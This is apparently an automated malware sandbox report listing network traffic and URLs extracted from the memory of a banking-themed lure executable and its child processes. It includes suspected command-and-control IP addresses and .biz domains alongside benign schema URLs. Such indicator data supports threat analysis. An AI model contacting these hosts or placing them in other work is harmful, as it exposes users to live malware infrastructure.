Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 21 Mar 2025 14:10:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Fri, 21 Mar 2025 14:10:47 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Source: niellist.exe, 00000011.00000002.1411628662.0000000000B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.21
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/
Source: niellist.exe, 00000003.00000002.1298601630.0000000000D07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/2X
Source: alg.exe, 00000002.00000003.1340496189.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/2m
Source: alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/bspqodujb
Source: alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/bspqodujbngs
Source: niellist.exe, 00000003.00000002.1298601630.0000000000D07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/eri
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/qnwbdottpdjvb
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/qnwbdottpdjvb588
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/qnwbdottpdjvbs
Source: alg.exe, 00000002.00000003.1339720537.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340849614.00000000004FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/twetxppkkq
Source: alg.exe, 00000002.00000003.1339720537.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1558654635.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1770492535.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1346185101.00000000004F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/twetxppkkqVt
Source: niellist.exe, 00000003.00000002.1294142638.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, niellist.exe, 00000003.00000002.1298601630.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196/woywqgxcq
Source: alg.exe, 00000002.00000003.1300228185.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/bspqodujb~vZ
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/qnwbdottpdjvbY
Source: alg.exe, 00000002.00000003.1558654635.0000000000513000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340849614.0000000000513000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/twetxppkkq
Source: niellist.exe, 00000003.00000002.1298601630.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.213.51.196:80/woywqgxcq
Source: alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/
Source: alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/12
Source: alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/12E
Source: alg.exe, 00000002.00000003.1312913508.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1314920250.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57/buysxojjpcbe
Source: alg.exe, 00000002.00000003.1313095660.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://3.229.117.57:80/buysxojjpcbeP
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, niellist.exe, 00000003.00000002.1293879138.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, niellist.exe, 00000011.00000002.1410876293.0000000000A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/Ad
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/DM
Source: alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/E
Source: alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/a
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1273923400.0000000000D75000.00000040.00000020.00020000.00000000.sdmp, Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/ahfjecsqgekcwio
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1273923400.0000000000D75000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/ahfjecsqgekcwioro
Source: alg.exe, 00000002.00000003.1307290100.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1312913508.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1314920250.00000000004F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/arkfkq
Source: niellist.exe, 00000003.00000002.1298601630.0000000000CF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/bwejhhjeahxfje
Source: alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/oqcvpoewhl
Source: alg.exe, 00000002.00000003.1279607006.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/oqcvpoewhl-v
Source: alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/rkfkq
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239:80/ahfjecsqgekcwio
Source: alg.exe, 00000002.00000003.1307088264.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239:80/arkfkq
Source: alg.exe, 00000002.00000003.1280251410.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239:80/oqcvpoewhl
Source: alg.exe, 00000002.00000003.1559227442.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1986704664.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1322367769.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340496189.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23/uhxgrttve
Source: alg.exe, 00000002.00000003.1322367769.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1986704664.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1559227442.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340496189.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://72.52.178.23:80/uhxgrttve
Source: alg.exe, 00000002.00000003.1771772723.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/
Source: alg.exe, 00000002.00000003.1986704664.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/J
Source: alg.exe, 00000002.00000003.1986704664.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/a
Source: alg.exe, 00000002.00000003.1559227442.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/gs
Source: alg.exe, 00000002.00000003.1770492535.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/iljywase
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/iljywasehv
Source: alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/kkjhdthfjo
Source: alg.exe, 00000002.00000003.1558654635.0000000000513000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/kkjhdthfjouemm1$
Source: alg.exe, 00000002.00000003.1987338757.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/qlbvcaqfgtptt
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/qlbvcaqfgtpttqtS
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/iljywase
Source: alg.exe, 00000002.00000003.1558654635.0000000000513000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/kkjhdthfjoP
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/qlbvcaqfgtpttcrobat
Source: powershell.exe, 0000000E.00000002.1464480139.000001FEBE977000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microskW
Source: powershell.exe, 0000000E.00000002.1464480139.000001FEBE90C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: powershell.exe, 0000000E.00000002.1437482472.000001FEB6143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: niellist.exe, 00000003.00000002.1293879138.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pywolwnvd.biz/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 0000000E.00000002.1397307978.000001FEA62FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: XClient.exe, 0000000B.00000002.2539294552.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1397307978.000001FEA60D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD84481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: powershell.exe, 0000000E.00000002.1397307978.000001FEA62FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/0
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response0
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response0
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/x
Source: alg.exe, 00000002.00000003.1322367769.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/
Source: alg.exe, 00000002.00000003.1322367769.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/N
Source: alg.exe, 00000002.00000003.1322162088.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280
Source: alg.exe, 00000002.00000003.1322162088.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280LocationETagAuthentication-InfoAgeAccept-Ra
Source: alg.exe, 00000002.00000003.1328245615.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1322162088.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280hv
